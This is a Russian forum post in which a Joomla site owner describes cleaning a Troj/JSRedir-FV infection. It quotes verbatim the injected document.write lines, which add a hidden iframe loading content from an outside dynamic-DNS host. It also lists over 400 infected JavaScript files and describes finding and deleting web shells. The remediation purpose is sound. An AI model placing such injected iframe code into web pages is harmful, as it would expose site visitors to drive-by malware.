Чистим от заражения Troj/JSRedir-FV

CB9T · 20.01.2013

Сегодня к сожалению обнаружил вирус на сайте (прислал весточку Яндекс), итак вирус добавляет в каждый файл iframe такого содержания:

Код (PHP):

document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://jfvavy.myddns.com/b019.jYAWO3YLrZW6Gi?default" height="110" width="110"></iframe>');

и

Код (PHP):

document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://jfvavy.myddns.com/538f7f43b3.0WhHi8TzVrtztN?default" height="110" width="110"></iframe>');

Для простоты эксперимента - зная, что необходимо удалять - берем replace.php или joomla-replace.php (я обозвал немного по другому)

и сканируем по данной фразе сайт:

Вирус найден в 400+ файлах:

Заданный текст найден в файлах:
1: ./administrator/modules/mod_cachecleaner/cachecleaner/js/script.js
2: ./administrator/modules/mod_cachecleaner/cachecleaner/js/script_mt12.js
3: ./administrator/modules/mod_cachecleaner/cachecleaner/js/script_mt11.js
4: ./administrator/modules/mod_addtomenu/js/script.js
5: ./administrator/modules/mod_addtomenu/addtomenu/js/script.js
6: ./administrator/modules/mod_addtomenu/addtomenu/js/script_mt12.js
7: ./administrator/modules/mod_addtomenu/addtomenu/js/script_mt11.js
8: ./administrator/modules/mod_betterpreview/betterpreview/js/ZeroClipboard.js
9: ./administrator/templates/bluestork/js/menu.js
10: ./administrator/templates/hathor/js/template.js
11: ./administrator/components/com_rsform/assets/js/jquery.scrollto.js
12: ./administrator/components/com_rsform/assets/js/rainbow.js
13: ./administrator/components/com_rsform/assets/js/script.js
14: ./administrator/components/com_rsform/assets/js/tablednd.js
15: ./administrator/components/com_rsform/assets/js/colors.js
16: ./administrator/components/com_rsform/assets/js/jquery.js
17: ./administrator/components/com_rsform/assets/js/rainbow12.js
18: ./administrator/components/com_nonumbermanager/js/process.js
19: ./administrator/components/com_nonumbermanager/js/script.js
20: ./administrator/components/com_nonumbermanager/js/script_mt12.js
21: ./administrator/components/com_nonumbermanager/js/script_mt11.js
22: ./administrator/components/com_jcomments/assets/jcomments-backend-v2.1.js
23: ./administrator/components/com_dbreplacer/js/script.js
24: ./administrator/components/com_dbreplacer/js/script_mt12.js
25: ./administrator/components/com_dbreplacer/js/script_mt11.js
26: ./administrator/components/com_jce/media/js/jce.js
27: ./administrator/components/com_jce/media/js/parameter.js
28: ./administrator/components/com_jce/media/js/uploads.js
29: ./administrator/components/com_jce/media/js/checklist.js
30: ./administrator/components/com_jce/media/js/extensions.js
31: ./administrator/components/com_jce/media/js/update.js
32: ./administrator/components/com_jce/media/js/cpanel.js
33: ./administrator/components/com_jce/media/js/preferences.js
34: ./administrator/components/com_jce/media/js/browser.js
35: ./administrator/components/com_jce/media/js/installer.js
36: ./administrator/components/com_jce/media/js/profiles.js
37: ./administrator/components/com_jce/media/js/users.js
38: ./modules/mod_colors_fsp/js/fspcolor.js
39: ./modules/mod_news_pro_gk4/admin/script.js
40: ./modules/mod_news_pro_gk4/interface/scripts/engine.js
41: ./modules/mod_news_pro_gk4/interface/scripts/engine.portal.mode.4.js
42: ./modules/mod_news_pro_gk4/interface/scripts/engine.portal.mode.1.js
43: ./modules/mod_news_pro_gk4/interface/scripts/engine.portal.mode.3.js
44: ./modules/mod_news_pro_gk4/interface/scripts/engine.portal.mode.2.js
45: ./media/com_admintools/js/encryption.js
46: ./media/com_admintools/js/json2.js
47: ./media/com_admintools/js/backend.js
48: ./media/com_admintools/js/scan.js
49: ./media/akeeba_strapper/js/akeebajqui.js
50: ./media/akeeba_strapper/js/akeebajq.js
51: ./media/akeeba_strapper/js/bootstrap.min.js
52: ./media/editors/tinymce/templates/template_list.js
53: ./media/editors/tinymce/jscripts/tiny_mce/tiny_mce_popup.js
54: ./media/editors/tinymce/jscripts/tiny_mce/tiny_mce.js
55: ./media/editors/codemirror/js/tokenizephp.js
56: ./media/editors/codemirror/js/parsedummy.js
57: ./media/editors/codemirror/js/basefiles-uncompressed.js
58: ./media/editors/codemirror/js/editor.js
59: ./media/editors/codemirror/js/undo.js
60: ./media/editors/codemirror/js/select.js
61: ./media/editors/codemirror/js/parsephphtmlmixed.js
62: ./media/editors/codemirror/js/parsehtmlmixed.js
63: ./media/editors/codemirror/js/stringstream.js
64: ./media/editors/codemirror/js/util.js
65: ./media/editors/codemirror/js/parsexml.js
66: ./media/editors/codemirror/js/parsecss.js
67: ./media/editors/codemirror/js/tokenize.js
68: ./media/editors/codemirror/js/tokenizejavascript.js
69: ./media/editors/codemirror/js/parsephp.js
70: ./media/editors/codemirror/js/parsesparql.js
71: ./media/editors/codemirror/js/highlight.js
72: ./media/editors/codemirror/js/codemirror.js
73: ./media/editors/codemirror/js/parsejavascript.js
74: ./media/editors/codemirror/js/codemirror-uncompressed.js
75: ./media/editors/codemirror/js/mirrorframe.js
76: ./media/editors/codemirror/js/basefiles.js
77: ./media/system/js/switcher-uncompressed.js
78: ./media/system/js/highlighter-uncompressed.js
79: ./media/system/js/progressbar.js
80: ./media/system/js/combobox-uncompressed.js
81: ./media/system/js/core-uncompressed.js
82: ./media/system/js/core.js
83: ./media/system/js/combobox.js
84: ./media/system/js/calendar.js
85: ./media/system/js/mootree.js
86: ./media/system/js/mootools-core-uncompressed.js
87: ./media/system/js/calendar-uncompressed.js
88: ./media/system/js/tabs.js
89: ./media/system/js/mooRainbow.js
90: ./media/system/js/highlighter.js
91: ./media/system/js/swf-uncompressed.js
92: ./media/system/js/swf.js
93: ./media/system/js/calendar-setup-uncompressed.js
94: ./media/system/js/mootools-more-uncompressed.js
95: ./media/system/js/switcher.js
96: ./media/system/js/uploader.js
97: ./media/system/js/validate-uncompressed.js
98: ./media/system/js/validate.js
99: ./media/system/js/uploader-uncompressed.js
100: ./media/system/js/mootools-core.js
101: ./media/system/js/modal-uncompressed.js
102: ./media/system/js/progressbar-uncompressed.js
103: ./media/system/js/modal.js
104: ./media/system/js/mootree-uncompressed.js
105: ./media/system/js/caption.js
106: ./media/system/js/multiselect.js
107: ./media/system/js/calendar-setup.js
108: ./media/system/js/caption-uncompressed.js
109: ./media/system/js/passwordstrength.js
110: ./media/system/js/mootools-more.js
111: ./media/system/js/mooRainbow-uncompressed.js
112: ./media/media/js/mediamanager.js
113: ./media/media/js/popup-imagemanager.js
114: ./media/plg_quickicon_extensionupdate/extensionupdatecheck.js
115: ./media/com_joomlaupdate/encryption.js
116: ./media/com_joomlaupdate/update.js
117: ./media/com_joomlaupdate/default.js
118: ./media/com_joomlaupdate/json2.js
119: ./media/overrider/js/overrider.js
120: ./media/kunena/js/mediaboxAdv.js
121: ./media/kunena/js/default.js
122: ./media/kunena/js/poll-min.js
123: ./media/kunena/js/uploader.js
124: ./media/kunena/js/plupload/plupload.js
125: ./media/kunena/js/plupload/plupload-min.js
126: ./media/kunena/js/plupload/i18n/fi-min.js
127: ./media/kunena/js/plupload/i18n/nl.js
128: ./media/kunena/js/plupload/i18n/es-min.js
129: ./media/kunena/js/plupload/i18n/fr.js
130: ./media/kunena/js/plupload/i18n/sv-min.js
131: ./media/kunena/js/plupload/i18n/ru.js
132: ./media/kunena/js/plupload/i18n/es.js
133: ./media/kunena/js/plupload/i18n/ja-min.js
134: ./media/kunena/js/plupload/i18n/da-min.js
135: ./media/kunena/js/plupload/i18n/cs.js
136: ./media/kunena/js/plupload/i18n/da.js
137: ./media/kunena/js/plupload/i18n/pt-br-min.js
138: ./media/kunena/js/plupload/i18n/lv.js
139: ./media/kunena/js/plupload/i18n/it.js
140: ./media/kunena/js/plupload/i18n/nl-min.js
141: ./media/kunena/js/plupload/i18n/fi.js
142: ./media/kunena/js/plupload/i18n/ja.js
143: ./media/kunena/js/plupload/i18n/pt-br.js
144: ./media/kunena/js/plupload/i18n/lv-min.js
145: ./media/kunena/js/plupload/i18n/ru-min.js
146: ./media/kunena/js/plupload/i18n/cs-min.js
147: ./media/kunena/js/plupload/i18n/fr-min.js
148: ./media/kunena/js/plupload/i18n/sv.js
149: ./media/kunena/js/plupload/i18n/de-min.js
150: ./media/kunena/js/plupload/i18n/de.js
151: ./media/kunena/js/plupload/i18n/it-min.js
152: ./media/kunena/js/debug-min.js
153: ./media/kunena/js/poll.js
154: ./media/kunena/js/uploader-min.js
155: ./media/kunena/js/grid-min.js
156: ./media/kunena/js/default-min.js
157: ./media/kunena/js/debug.js
158: ./media/kunena/js/mediaboxAdv-min.js
159: ./media/kunena/js/grid.js
160: ./media/com_finder/js/autocompleter.js
161: ./media/com_finder/js/indexer.js
162: ./media/com_finder/js/highlighter.js
163: ./media/com_finder/js/finder.js
164: ./media/com_finder/js/sliderfilter.js
165: ./media/plg_quickicon_joomlaupdate/jupdatecheck.js
166: ./counter/cb9t/swfobject.js
167: ./counter/antifa/swfobject.js
168: ./counter/cuba77/swfobject.js
169: ./counter/tymoshenko/swfobject.js
170: ./counter/kbz/swfobject.js
171: ./share42.js
172: ./templates/beez_20/javascript/hide.js
173: ./templates/beez_20/javascript/md_stylechanger.js
174: ./templates/jblank/js/transfers.js
175: ./templates/jblank/js/highslid.js
176: ./templates/jblank/js/prefixfree.min.js
177: ./templates/jblank/js/jquery.mousewheel.3.0.2.min.js
178: ./templates/jblank/js/jquery.easing.1.3.min.js
179: ./templates/jblank/js/jquery00.js
180: ./templates/jblank/js/ui000003.js
181: ./templates/jblank/js/jquery.cookie.1.0.0.js
182: ./templates/jblank/js/ui000002.js
183: ./templates/jblank/js/jquery.mousewheel.3.0.2.js
184: ./templates/jblank/js/jquery.core.1.6.4.js
185: ./templates/jblank/js/jquery.swfobject.1.1.1.min.js
186: ./templates/jblank/js/ui000004.js
187: ./templates/jblank/js/jquery01.js
188: ./templates/jblank/js/jquery.core.1.6.4.min.js
189: ./templates/jblank/js/ui000001.js
190: ./templates/jblank/js/system_debug.js
191: ./templates/jblank/js/jquery.swfobject.1.1.1.js
192: ./templates/jblank/js/stats000.js
193: ./templates/jblank/js/jquery.tools.js
194: ./templates/jblank/js/jquery.easing.1.3.js
195: ./templates/jblank/js/ui000000.js
196: ./templates/jblank/js/_application.js
197: ./templates/jblank/js/jquery.cookie.1.0.0.min.js
198: ./templates/jblank/js/function.js
199: ./templates/blog-1.7/js/transfers.js
200: ./templates/blog-1.7/js/highslid.js
201: ./templates/blog-1.7/js/prefixfree.min.js
202: ./templates/blog-1.7/js/jquery.mousewheel.3.0.2.min.js
203: ./templates/blog-1.7/js/jquery.easing.1.3.min.js
204: ./templates/blog-1.7/js/jquery00.js
205: ./templates/blog-1.7/js/ui000003.js
206: ./templates/blog-1.7/js/jquery.cookie.1.0.0.js
207: ./templates/blog-1.7/js/ui000002.js
208: ./templates/blog-1.7/js/jquery.mousewheel.3.0.2.js
209: ./templates/blog-1.7/js/jquery.core.1.6.4.js
210: ./templates/blog-1.7/js/jquery.swfobject.1.1.1.min.js
211: ./templates/blog-1.7/js/ui000004.js
212: ./templates/blog-1.7/js/jquery01.js
213: ./templates/blog-1.7/js/jquery.core.1.6.4.min.js
214: ./templates/blog-1.7/js/ui000001.js
215: ./templates/blog-1.7/js/system_debug.js
216: ./templates/blog-1.7/js/jquery.swfobject.1.1.1.js
217: ./templates/blog-1.7/js/stats000.js
218: ./templates/blog-1.7/js/jquery.tools.js
219: ./templates/blog-1.7/js/jquery.easing.1.3.js
220: ./templates/blog-1.7/js/ui000000.js
221: ./templates/blog-1.7/js/_application.js
222: ./templates/blog-1.7/js/jquery.cookie.1.0.0.min.js
223: ./templates/blog-1.7/js/function.js
224: ./templates/gk_the_real_design/admin/scripts.js
225: ./templates/gk_the_real_design/js/selectivizr.js
226: ./templates/gk_the_real_design/js/mobile/gk.handheld.js
227: ./templates/gk_the_real_design/js/mobile/gk.iphone.js
228: ./templates/gk_the_real_design/js/mobile/zepto.js
229: ./templates/gk_the_real_design/js/mobile/gk.android.js
много - много файлов
375: ./components/com_rsform/assets/js/script.js
376: ./components/com_rsform/assets/js/pages.js
377: ./components/com_rsform/assets/calendar/cal.js
378: ./components/com_kunena/template/default/js/editor-min.js
379: ./components/com_kunena/template/default/js/editor.js
380: ./components/com_kunena/template/default/js/default.js
381: ./components/com_kunena/template/default/js/debug-min.js
382: ./components/com_kunena/template/default/js/default-min.js
383: ./components/com_kunena/template/default/js/debug.js
384: ./components/com_kunena/template/blue_eagle/js/editor-min.js
385: ./components/com_kunena/template/blue_eagle/js/editor.js
386: ./components/com_jcomments/js/jcomments-v2.3.js
387: ./components/com_jcomments/libraries/joomlatune/ajax.js
388: ./components/com_jce/editor/tiny_mce/tiny_mce_popup.js
389: ./components/com_jce/editor/tiny_mce/langs/en_dlg.js
390: ./components/com_jce/editor/tiny_mce/langs/en.js
391: ./components/com_jce/editor/tiny_mce/tiny_mce.js
392: ./components/com_jce/editor/libraries/js/help.js
393: ./components/com_jce/editor/libraries/js/html5.js
394: ./components/com_jce/editor/libraries/js/editor.js
395: ./components/com_jce/editor/libraries/js/extensions.js
396: ./components/com_jce/editor/libraries/js/select.js
397: ./components/com_jce/editor/libraries/js/tips.js
398: ./components/com_jce/editor/libraries/js/upload.js
399: ./components/com_jce/editor/libraries/js/tree.js
400: ./components/com_jce/editor/libraries/js/tiny_mce_utils.js
401: ./components/com_jce/editor/libraries/js/colorpicker.js
402: ./components/com_jce/editor/libraries/js/plugin.js
403: ./components/com_jce/editor/libraries/js/pdf.js
404: ./components/com_jce/editor/libraries/plupload/plupload.full.js
405: ./components/com_jce/media/js/popup.js

Время выполнения: 0.873384 сек.

Далее задаем маску и чистим, также не забываем проверить еще раз и удалить сам скрипт замены!

Скриншоты

----------------------------

Рано радоваться! Надо найти шелл! я нашел из 10 сайтов только на 1 сайте шелл с названием:
jos_40iw.php и j.php

внутри комментарий (шелл от vBulletin 3.1.9)

Чистим, сносим и все гуд!

Однако и это не панацея.... самый верный способ оказался:

Код (PHP):

find /home/путь/ -type f -iname "*.php" -mtime -7

найти все файлы созданные за 7 дней пхп

и через replacer.php и WinSCP (или FTP) все заменить и бэкдоры удалить!

Наши спонсоры

Войти или зарегистрироваться

Чистим от заражения Troj/JSRedir-FV

CB9T Преподаватель по J! Команда форума ⇒ Профи ⇐

Наши спонсоры

Поделиться этой страницей

Войти или зарегистрироваться

Чистим от заражения Troj/JSRedir-FV

CB9T Преподаватель по J! Команда форума ⇒ Профи ⇐

Наши спонсоры

Поделиться этой страницей

Быстрый поиск